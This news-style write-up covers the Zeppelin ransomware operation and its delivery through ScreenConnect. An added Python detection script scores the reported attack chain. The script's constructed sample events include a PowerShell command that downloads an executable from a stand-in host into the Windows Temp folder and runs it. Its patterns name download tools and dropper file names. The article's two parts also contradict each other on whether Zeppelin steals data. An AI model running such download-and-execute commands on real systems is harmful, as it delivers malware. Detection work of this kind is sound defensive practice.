
Zeppelin Ransomware Has Resumed Operations After a Temporary Pause

According to BleepingComputer, the operators of the Zeppelin ransomware-as-a-service (RaaS), also known as Buran, have resumed operations after a brief outage. Unlike many other ransomware operations, Zeppelin's operators do not steal data from victims and do not run a leak site.

Researchers at BlackBerry Cylance first documented Zeppelin, a new variant of the Vega RaaS, in November 2019, when it was used in attacks against technology and healthcare companies in Europe, the United States, and Canada. It was distributed through a watering-hole attack in which the PowerShell payloads were hosted on Pastebin.

Unlike other Vega variants, Zeppelin does not infect machines in Russia or other former Soviet countries such as Ukraine, Belarus, and Kazakhstan. Once executed, the ransomware enumerates files on all drives and network shares and attempts to encrypt them. The researchers found that the encryption scheme is the same one used by other Vega variants.

“This is in contrast with the classic RaaS operations, where developers typically look for partners to breach into a victim network, to steal data, and deploy the file-encrypting malware. The two parties then split paid ransoms, with developers getting the smaller piece (up to 30%),” reported BleepingComputer. 

Advanced Intel (AdvIntel), a threat-detection and loss-avoidance firm, found that the Zeppelin developers revamped their operation in March, announcing a "big software upgrade" and a new round of sales. According to AdvIntel's head of research, Yelisey Boguslavskiy, the new Zeppelin version sells for $2,300 per core build.

Following that update, the developers released a new version of the malware on April 27 that added few new features but improved the stability of the encryption. They also promised continued development and special treatment for long-term customers, whom they call "subscribers".

“We continue to work. We provide individual conditions and a loyal approach for each subscriber; the conditions are negotiable. Write to us, and we will be able to agree on mutually beneficial terms of cooperation,” the Zeppelin operators said.

Zeppelin is one of the few ransomware operations that does not use a pure RaaS model, yet it is also one of the most widely used, with high-profile members of the cybercrime community recommending it.

Zeppelin Is Back! Ransomware Stealing Data via Remote Management Software


Attackers are using remote management software to steal data and move through networks before deploying the Zeppelin ransomware on compromised devices.

The software in question is ConnectWise Control, which generates agents that are installed on target computers. Once an agent runs, the device appears in the ConnectWise Control management site.

ConnectWise Control is remote management software commonly used by MSPs and IT professionals to access and support remote devices.

Reports indicate that Zeppelin was recently spread via ScreenConnect, the earlier name of ConnectWise Control, a desktop control tool used to remotely execute commands on and manage a user's device.

In one incident, the ScreenConnect client was installed on a compromised workstation, leading to the compromise of a large real estate company's network.

The client, ScreenConnect.ClientService.exe, runs undetected in the background, waiting for a remote management connection.

The attackers then used it to run numerous commands that harvested data from backup systems and installed malware: data-stealing trojans, additional post-exploitation tools to expand their foothold in the network, and finally the Zeppelin ransomware.

The attack starts with a CMD script that prepares the device for the ransomware. It imports a registry file that sets the public encryption key the ransomware will use and disables Windows Defender by turning off several of its protection features.

The attacker then runs a PowerShell command that downloads the Zeppelin ransomware as a file named oxfordnew.exe or oxford.exe into the C:\Windows\Temp folder.
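The chain described above (ScreenConnect client spawning a CMD script, a registry import that tampers with Defender, a PowerShell download into C:\Windows\Temp, and execution of oxford.exe / oxfordnew.exe from there) is a good candidate for a scored detection over process-creation telemetry. The following is an added example written for this page, not code from BleepingComputer or from the attackers; the sample events are constructed Sysmon-style records, and the host names, the example.invalid URL, the helper names, the weights and the alert threshold are all assumptions. Because ScreenConnect legitimately spawns cmd.exe during normal MSP support sessions, a single such spawn scores low; the alert fires only when several stages of the chain are seen on one host.

```python
"""Score process-creation events for the ScreenConnect -> Zeppelin chain.

Added example: the events below are constructed to mirror the reported
attack chain and are not a real capture.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: str        # timestamp
    host: str      # endpoint name
    parent: str    # parent image path
    image: str     # child image path
    cmdline: str   # child command line


# Constructed sample: WS01 is a benign support session, FS02 is the intrusion.
SAMPLE_EVENTS = [
    ProcEvent("2020-06-01T09:00:01", "WS01",
              r"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.ClientService.exe",
              r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c ipconfig /all"),
    ProcEvent("2020-06-01T22:13:04", "FS02",
              r"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.ClientService.exe",
              r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c C:\Windows\Temp\prep.cmd"),
    ProcEvent("2020-06-01T22:13:05", "FS02",
              r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\reg.exe",
              r"reg.exe import C:\Windows\Temp\settings.reg"),
    ProcEvent("2020-06-01T22:13:09", "FS02",
              r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/o.exe','C:\Windows\Temp\oxfordnew.exe')"),
    ProcEvent("2020-06-01T22:13:40", "FS02",
              r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\Temp\oxfordnew.exe",
              r"C:\Windows\Temp\oxfordnew.exe"),
]

# Indicators taken from the write-up; weights are this example's assumption.
RMM_PARENT = re.compile(r"\\ScreenConnect\.ClientService\.exe$", re.I)
SHELLS = re.compile(r"\\(cmd|powershell|pwsh|reg)\.exe$", re.I)
REG_IMPORT = re.compile(r"\breg(\.exe)?\s+import\b", re.I)
DOWNLOAD = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
WIN_TEMP = re.compile(r"C:\\Windows\\Temp\\", re.I)
TEMP_EXEC = re.compile(r"^C:\\Windows\\Temp\\.*\.exe$", re.I)
ZEPPELIN_NAMES = re.compile(r"\\oxford(new)?\.exe\b", re.I)


def score_event(ev):
    """Return (score, reasons) for a single process-creation event."""
    score, reasons = 0, []
    if RMM_PARENT.search(ev.parent) and SHELLS.search(ev.image):
        score += 1
        reasons.append("shell spawned by ScreenConnect client")   # common in support sessions too
    if REG_IMPORT.search(ev.cmdline):
        score += 1
        reasons.append("registry import (key config / Defender tampering)")
    if DOWNLOAD.search(ev.cmdline) and WIN_TEMP.search(ev.cmdline):
        score += 2
        reasons.append("PowerShell download into C:\\Windows\\Temp")
    if TEMP_EXEC.search(ev.image):
        score += 2
        reasons.append("execution from C:\\Windows\\Temp")
    if ZEPPELIN_NAMES.search(ev.image) or ZEPPELIN_NAMES.search(ev.cmdline):
        score += 3
        reasons.append("known Zeppelin dropper file name")
    return score, reasons


def find_zeppelin_chains(events, threshold=4):
    """Aggregate scores per host; return hosts at or above the threshold."""
    per_host = {}
    for ev in events:
        s, why = score_event(ev)
        if not s:
            continue
        entry = per_host.setdefault(ev.host, {"score": 0, "reasons": []})
        entry["score"] += s
        entry["reasons"].extend(f"{ev.ts} {w}" for w in why)
    return {h: e for h, e in per_host.items() if e["score"] >= threshold}


if __name__ == "__main__":
    for host, hit in find_zeppelin_chains(SAMPLE_EVENTS).items():
        print(f"[ALERT] {host} score={hit['score']}")
        for line in hit["reasons"]:
            print("   ", line)
```

In real use, feed the function with Sysmon Event ID 1 or EDR process-creation records and tune the weights to your environment; the point of aggregating per host is that the RMM-to-shell spawn alone is not evidence of compromise, while a registry import, a download into the Temp folder and an execution from it within the same session are.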

Typically, such attacks begin by compromising the MSP and then abusing its remote management software against the MSP's customers.

Here, however, the attackers deployed the ScreenConnect software themselves, giving them full control over the compromised host and room to cause as much damage as possible.

Ransomware attacks are increasingly combined with data theft, with the stolen data used as leverage to pressure victims into paying.

Zeppelin, Maze, and REvil are among the leading names in the ransomware market.